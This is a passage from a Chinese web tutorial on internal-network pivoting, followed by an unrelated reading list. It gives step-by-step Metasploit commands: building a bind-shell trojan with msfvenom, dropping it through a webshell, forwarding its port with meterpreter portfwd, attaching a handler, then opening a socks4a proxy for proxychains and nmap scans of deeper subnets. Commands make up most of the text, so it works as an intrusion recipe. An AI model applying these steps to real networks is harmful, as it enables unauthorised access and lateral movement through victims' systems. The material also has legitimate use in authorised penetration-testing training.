新起一个终端:msf生成一个bindshell的木马(正向连接)
msfvenom -p linux/x86/meterpreter/bind_tcp lport=9999 -f elf -o bindshell放到通过webshell 放到/var/tmp/下加权限,启动
![”什么是内网穿透“详解](http://img.jiangsulong.com/220406/235TMQ1-23.jpg)
文章插图
现在内网10.0.0.3在9999端口开启直接连shell权限,现在要做一个新的转发把10.0.0.3:9999端口转发到本地,然后msf直连
![”什么是内网穿透“详解](http://img.jiangsulong.com/220406/235TK953-24.jpg)
文章插图
sessions sessions id编号meterpreter > portfwd add -L 127.0.0.1 -l 9999 -p 10.0.0.3 -r 9999
![”什么是内网穿透“详解](http://img.jiangsulong.com/220406/235TL213-25.jpg)
文章插图
现在内网10.0.0.3的bindshell 9999 端口 转发到 本地127.0.0.1:9999端口了
msf进行直连shell
use exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpshow optionsset LPORT 9999set RHOST 127.0.0.1run
![”什么是内网穿透“详解](http://img.jiangsulong.com/220406/235TH220-26.jpg)
文章插图
等待连接shell
![”什么是内网穿透“详解](http://img.jiangsulong.com/220406/235TJa5-27.jpg)
文章插图
反弹shell后,只需要在10.0.0.3的shell上
use auxiliary/server/socks4aset 127.0.0.1set srvport 1081run添加一个新隧道在/etc/proxychains.conf 中添加 socks4 127.0.0.1 1081
在proxychains nmap 扫描就是直接连接到10.0.0.3上进行转发扫描,内网二级穿透扫描
127.0.0.1:1080<>主站跳板跳板机<>10.0.0.3跳板机<>新ip(192.168.0.1)实现了双跳板机内网穿透,同样方法,要是拿到192.168.0.1的第三层内网,只需要之前的添加个端口转发到本地,就能继续渗透 。一般内网到第二层流量很少了,继续深层网段渗透就需要上 EW穿透神器等工具 。
总结一下流程,拿到webshell,上传木马反弹的msf,msf做socks4的代理然后添加端口转发,进行下一层渗透,第二层同样继续反弹shell,做代理,端口转发 。
【”什么是内网穿透“详解】
推荐阅读
- 什么是以太网和以太网交换机?
- 使用 Golang 构建整洁架构
- 夏天防晒衣什么颜色好 ohsunny防晒衣颜色怎么选
- 全罩杯怎么区分 全罩杯半罩杯哪个好
- 杨梅汁怎么做 杨梅汁怎么洗得掉鞋子
- 10月10日精神病宣传日 2021世界精神卫生日是几月几日
- 哪个牌子的奶酪棒最正宗 李易峰求的奶酪面包是什么牌子
- linux命令监测网址是否正常访问
- 衣服有静电怎么去除 衣服粘毛是因为静电吗
- CSS 基础选择器